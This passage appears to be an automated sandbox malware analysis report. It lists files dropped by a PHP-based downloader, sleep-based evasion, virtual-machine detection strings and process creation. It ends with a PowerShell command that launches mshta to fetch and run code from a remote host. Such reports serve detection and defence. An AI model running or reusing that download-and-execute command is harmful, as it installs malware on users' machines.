        Source: php_zend_test.dll.21.drBinary or memory string: ZEND_TEST.OBSERVER.ENABLED0ZEND_TEST.OBSERVER.SHOW_OUTPUT1ZEND_TEST.OBSERVER.OBSERVE_ALLZEND_TEST.OBSERVER.OBSERVE_INCLUDESZEND_TEST.OBSERVER.OBSERVE_FUNCTIONSZEND_TEST.OBSERVER.OBSERVE_DECLARINGZEND_TEST.OBSERVER.OBSERVE_FUNCTION_NAMESZEND_TEST.OBSERVER.SHOW_RETURN_TYPEZEND_TEST.OBSERVER.SHOW_RETURN_VALUEZEND_TEST.OBSERVER.SHOW_INIT_BACKTRACEZEND_TEST.OBSERVER.SHOW_OPCODEZEND_TEST.OBSERVER.SHOW_OPCODE_IN_USER_HANDLERZEND_TEST.OBSERVER.FIBER_INITZEND_TEST.OBSERVER.FIBER_SWITCHZEND_TEST.OBSERVER.FIBER_DESTROYZEND_TEST.OBSERVER.EXECUTE_INTERNALCANNOT CALL %.*S() DYNAMICALLYSOURCE_STRINGFILENAMEPOSITIONARGSTRVARIABLEBYTES3PARAMSTDCLASSARG1TRAVERSABLEARG2OBJECTZENDTESTUNITENUMPARAMETEROBJ_OR_CLASSMETHODMESSAGETHROWABLEELEMENTSEXCEPTIONZENDTESTNS\UNLIKELYCOMPILEERRORZEND_TEST_ARRAY_RETURNZEND_TEST_NULLABLE_ARRAY_RETURNZEND_TEST_VOID_RETURNZEND_TEST_COMPILE_STRINGZEND_TEST_DEPRECATEDZEND_TEST_ALIASEDZEND_TEST_DEPRECATED_ALIASEDZEND_CREATE_UNTERMINATED_STRINGZEND_TERMINATE_STRINGZEND_LEAK_VARIABLEZEND_LEAK_BYTESZEND_STRING_OR_OBJECTZEND_STRING_OR_OBJECT_OR_NULLZEND_STRING_OR_STDCLASSZEND_STRING_OR_STDCLASS_OR_NULLZEND_ITERABLEZEND_WEAKMAP_ATTACHZEND_WEAKMAP_REMOVEZEND_WEAKMAP_DUMPZEND_GET_UNIT_ENUMZEND_TEST_PARAMETER_WITH_ATTRIBUTEZEND_GET_CURRENT_FUNC_NAMEZEND_CALL_METHODZEND_TEST_ZEND_INI_PARSE_QUANTITYZEND_TEST_ZEND_INI_PARSE_UQUANTITYZEND_TEST_ZEND_INI_STRZEND_GET_MAP_PTR_LASTZEND_TEST_CRASHZENDTESTNS2\NAMESPACED_FUNCZENDTESTNS2\NAMESPACED_DEPRECATED_FUNCZENDTESTNS2\NAMESPACED_ALIASED_FUNCZENDTESTNS2\NAMESPACED_DEPRECATED_ALIASED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_DEPRECATED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_ALIASED_FUNCZENDTESTNS2\ZENDSUBNS\NAMESPACED_DEPRECATED_ALIASED_FUNCIS_OBJECT__TOSTRINGRETURNSSTATICRETURNSTHROWABLEVARIADICTESTTESTMETHODNO_OVERRIDEOVERRIDECALLCALLSTATICZEND_TEST_DEPRECATEDGLOBALZEND_CONSTANT_ANAMESPACEDZENDTESTNS2\ZEND_CONSTANT_AZENDTESTNS2\ZENDSUBNS\ZEND_CONSTANT_A_ZENDTESTINTERFACEDUMMY_ZENDTESTCLASS_ZENDTESTCLASSALIAS_STATICPROPSTATICINTPROPINTPROPCLASSPROPCLASSUNIONPROPCOUNTABLECLASSINTERSECTIONPROPREADONLYPROP_ZENDTESTCHILDCLASS_ZENDTESTTRAITTESTPROPZENDTESTATTRIBUTEATTRIBUTEZENDTESTPARAMETERATTRIBUTEZENDTESTPROPERTYATTRIBUTEZENDTESTCLASSWITHMETHODWITHPARAMETERATTRIBUTEZENDTESTCHILDCLASSWITHMETHODWITHPARAMETERATTRIBUTEZENDTESTFORBIDDYNAMICCALLFOOBARZENDTESTSTRINGENUMTEST1TEST2TEST2\ABAZ42FORTYTWOZENDTESTINTENUMZENDTESTNS\FOOZENDTESTNS2\FOOZENDTESTNS2\ZENDSUBNS\FOOFOOPASS1
        Source: php_zend_test.dll.21.drBinary or memory string: ZEND_TEST.OBSERVER.EXECUTE_INTERNAL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2106Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1405Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1276Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 649Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5494Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3106Jump to behavior
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_intl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8apache2_4.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mysqli.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libpq.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_shmop.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_pgsql.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_openssl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsasl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pgsql.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_imap.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-cgi.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php8phpdbg.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_odbc.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\phpdbg.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_oci.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsodium.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.exeJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_snmp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\nghttp2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_firebird.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libsqlite3.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssl-3-x64.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_mbstring.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_opcache.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_oci8_19.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_mysql.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1]Jump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gmp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libssh2.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_sqlite.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_pdo_odbc.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dllJump to dropped file
        Source: C:\Windows\System32\tar.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ldap.dllJump to dropped file
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeAPI coverage: 9.0 %
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeAPI coverage: 2.9 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 1276 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 649 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 7992Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -17524406870024063s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 9212Thread sleep time: -72000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 9212Thread sleep time: -330000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 8244Thread sleep time: -51000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe TID: 8244Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E42110 FindFirstFileExW,12_2_00007FF658E42110
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
        Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CCA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClasserver5
        Source: powershell.exe, 00000007.00000002.1833123657.000001F423E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Essential Server Solutions Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard Edition (without Hyper-V)
        Source: mshta.exe, 00000005.00000003.1885470413.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888760600.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2897796368.000001B97E658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2894827777.000001B97D02B000.00000004.00000020.00020000.00000000.sdmp, php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.00000248770D3000.00000004.00000020.00020000.00000000.sdmp, php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.000002487708D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise Edition (without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Windows 11Windows 10Windows Server 2022Windows Server, version 20H2Windows Server, version 2004Windows Server, version 1909Windows Server, version 1903Windows Server 2019Windows Server, version 1803Windows Server, version 1709Windows Server 2016Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8.1Windows Server 2012 R2Windows 8Windows Server 2012Unknown Windows versionUltimate EditionHome Basic EditionHome Premium EditionEnterprise EditionHome Basic N EditionProfessional EditionBusiness EditionStandard EditionDatacenter EditionSmall Business ServerStarter N EditionStarter EditionDatacenter Edition (core installation)Standard Edition (core installation)Enterprise Edition (core installation)Enterprise Edition for Itanium-based SystemsProfessional N EditionBusiness N EditionWeb Server EditionHPC EditionStorage Server Essentials EditionStorage Server Express EditionStorage Server Standard EditionStorage Server Workgroup EditionStorage Server Enterprise EditionEssential Server Solutions EditionSmall Business Server Premium EditionHome Premium N EditionEnterprise N EditionUltimate N EditionWeb Server Edition (core installation)Essential Business Server Management Server EditionEssential Business Server Management Security EditionEssential Business Server Management Messaging EditionFoundation EditionHome Server 2011 EditionEssential Server Solutions Edition (without Hyper-V)Standard Edition (without Hyper-V)Datacenter Edition (without Hyper-V)Enterprise Edition (without Hyper-V)Datacenter Edition (core installation, without Hyper-V)Standard Edition (core installation, without Hyper-V)Enterprise Edition (core installation, without Hyper-V)Hyper-V ServerStorage Server Express Edition (core installation)Storage Server Standard Edition (core installation)Storage Server Workgroup Edition (core installation)Storage Server Enterprise Edition (core installation)Small Business Server 2011 Essentials EditionServer For SB Solutions EditionSolutions Premium EditionSolutions Premium Edition (core installation)Server For SB Solutions EM EditionMultiPoint Server EditionEssential Server Solution Management EditionEssential Server Solution Additional EditionEssential Server Solution Management SVC EditionEssential Server Solution Additional SVC EditionSmall Business Server Premium Edition (core installation)Hyper Core V EditionEnterprise Edition (evaluation installation)MultiPoint Server Standard Edition (full installation)MultiPoint Server Premium Edition (full installation)Standard Edition (evaluation installation)Datacenter Edition (evaluation installation)Enterprise N Edition (evaluation installation)Storage Server Workgroup Edition (evaluation installation)Storage Server Standard Edition (evaluation installation)Windows 8 N EditionWindows 8 China EditionWindows 8 Single Language EditionWindows 8 EditionProfessional with Media Center Editioni%dMIPS R%d000Alpha %dPPC 6%02dIA64IA32AMD64ARM64Windows NTbuild %dbuild %d (%s)%s %s %d.%d build %d (%s)
        Source: powershell.exe, 00000007.00000002.1833123657.000001F423E14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard Edition (core installation, without Hyper-V)
        Source: php.exe, 00000018.00000002.2892213173.000001E12C0C9000.00000004.00000020.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892485381.0000014E5BB58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Hyper-V Server
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E333E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF658E333E8
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E43384 GetProcessHeap,12_2_00007FF658E43384
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E333E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF658E333E8
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2DD08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF658E2DD08
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2DEF0 SetUnhandledExceptionFilter,12_2_00007FF658E2DEF0
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2DF5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF658E2DF5C
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498CC4E4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00007FF7498CC4E4
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498CBC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FF7498CBC50
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498CC68C SetUnhandledExceptionFilter,24_2_00007FF7498CC68C
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FFE1A530468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00007FFE1A530468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/sammJump to behavior
